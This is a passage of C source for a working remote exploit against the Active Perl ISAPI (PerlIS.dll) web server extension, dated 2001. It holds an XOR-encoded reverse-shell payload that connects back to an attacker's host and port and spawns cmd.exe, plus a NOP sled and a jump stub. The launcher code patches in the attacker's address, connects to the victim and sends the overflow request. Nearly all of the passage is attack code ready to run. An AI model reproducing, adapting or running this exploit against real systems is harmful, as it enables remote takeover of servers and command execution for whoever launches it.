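        "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
        // PORT_OFF (bytes 10-11 of this line) and HOST_OFF (bytes 15-18)
        "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x55\x3d\x97\x94"
        "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
        "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
        "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
        "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
        "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
        "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
        "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
        "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
        // Encoded NUL-separated name table: "GetProcAddress", "LoadLibraryA",
        // "CreatePipe", "GetStartupInfoA", "CreateProcessA", "PeekNamedPipe",
        // "GlobalAlloc", "WriteFile", "ReadFile", "Sleep", "ExitProcess",
        // "CloseHandle", "WSOCK32", "WSAStartup", "socket", "closesocket",
        // "connect", "send", "recv", "cmd.exe" (each byte ^ 0x95).
        "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
        "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
        "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
        "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
        "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
        "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
        "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
        "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
        "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
        "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
        "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
        "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
        "\xf0\xed\xf0\x95"
        // 337-byte NOP sled
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        // Short stub (xor eax,eax / mov al,0x90 / add ebx,eax / mov eax,[ebx]
        // / mov eax,[eax+0x60] / ... / jmp eax / jmp back), presumably what
        // the overwritten return address is meant to reach - not analysed.
        "\x33\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
        "\xeb\xb9\x90\x90\x05\x31\x8c\x6a"
        // ".pl HTTP/1.0\r\n\r\n" + explicit NUL (.pl is what PerlIS.dll is mapped to)
        "\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x0D\x0A\x00";

        // Bytes on the wire: everything before the explicit \x00 (the array
        // also carries the compiler's own terminator, hence -2).
        const int request_len = (int)sizeof shellcode - 2;
        unsigned short victim_port, attacker_port, nport;
        unsigned long victim_addr, attacker_addr;
        unsigned char port_bytes[2], host_bytes[4];
        WSADATA wsaData;
        SOCKADDR_IN anAddr;
        SOCKET s;
        int i, rc;

        printf("\njack - Active Perl ISAPI overflow launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");

        if (argc != 5) {
                printf("Usage: %s <victim host> <victim port> <attacker host> <attacker port>\n", argv[0]);
                return 1;
        }

        victim_port = parse_port(argv[2]);
        attacker_port = parse_port(argv[4]);
        if (victim_port == 0 || attacker_port == 0) {
                fprintf(stderr, "ports must be decimal numbers in 1..65535\n");
                return 1;
        }

        // inet_addr() returns the address in network byte order and
        // INADDR_NONE on a parse failure (which also makes the literal
        // 255.255.255.255 unusable - acceptable here).
        victim_addr = inet_addr(argv[1]);
        attacker_addr = inet_addr(argv[3]);
        if (victim_addr == INADDR_NONE || attacker_addr == INADDR_NONE) {
                fprintf(stderr, "hosts must be dotted-quad IPv4 addresses\n");
                return 1;
        }

        // Refuse to patch unless the placeholders are where the offsets
        // say: a one-byte slip in the literal above would otherwise corrupt
        // the payload silently.
        if (request_len < HOST_OFF + (int)sizeof host_bytes ||
            memcmp(&shellcode[PORT_OFF], port_default, sizeof port_default) != 0 ||
            memcmp(&shellcode[HOST_OFF], host_default, sizeof host_default) != 0) {
                fprintf(stderr, "payload layout mismatch at PORT_OFF/HOST_OFF; refusing to patch\n");
                return 1;
        }

        // Pre-encode with the decoder's key so the XOR loop restores the
        // real values.  Both inputs are already in network byte order, so
        // copying their in-memory bytes is endian-independent.  A byte equal
        // to 0x95 encodes to 0x00; that is now sent rather than truncating
        // the request as strlen() did.
        nport = htons(attacker_port);
        memcpy(port_bytes, &nport, sizeof port_bytes);
        memcpy(host_bytes, &attacker_addr, sizeof host_bytes);
        for (i = 0; i < (int)sizeof port_bytes; i++)
                shellcode[PORT_OFF + i] = port_bytes[i] ^ XOR_KEY;
        for (i = 0; i < (int)sizeof host_bytes; i++)
                shellcode[HOST_OFF + i] = host_bytes[i] ^ XOR_KEY;

        if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) {
                fprintf(stderr, "WSAStartup failed\n");
                return 1;
        }

        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                fprintf(stderr, "socket failed: %d\n", WSAGetLastError());
                WSACleanup();
                return 1;
        }

        memset(&anAddr, 0, sizeof anAddr);
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(victim_port);
        anAddr.sin_addr.S_un.S_addr = victim_addr;

        if (connect(s, (struct sockaddr *)&anAddr, sizeof anAddr) != 0) {
                fprintf(stderr, "connect failed: %d\n", WSAGetLastError());
                closesocket(s);
                WSACleanup();
                return 1;
        }

        printf("Sending exploit....");

        rc = send_all(s, shellcode, request_len);
        if (rc != 0)
                printf("send: error sending first packet\n\n");
        else
                printf("Exploit sent.\n\n");

        closesocket(s);
        WSACleanup();

        return rc == 0 ? 0 : 1;
}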


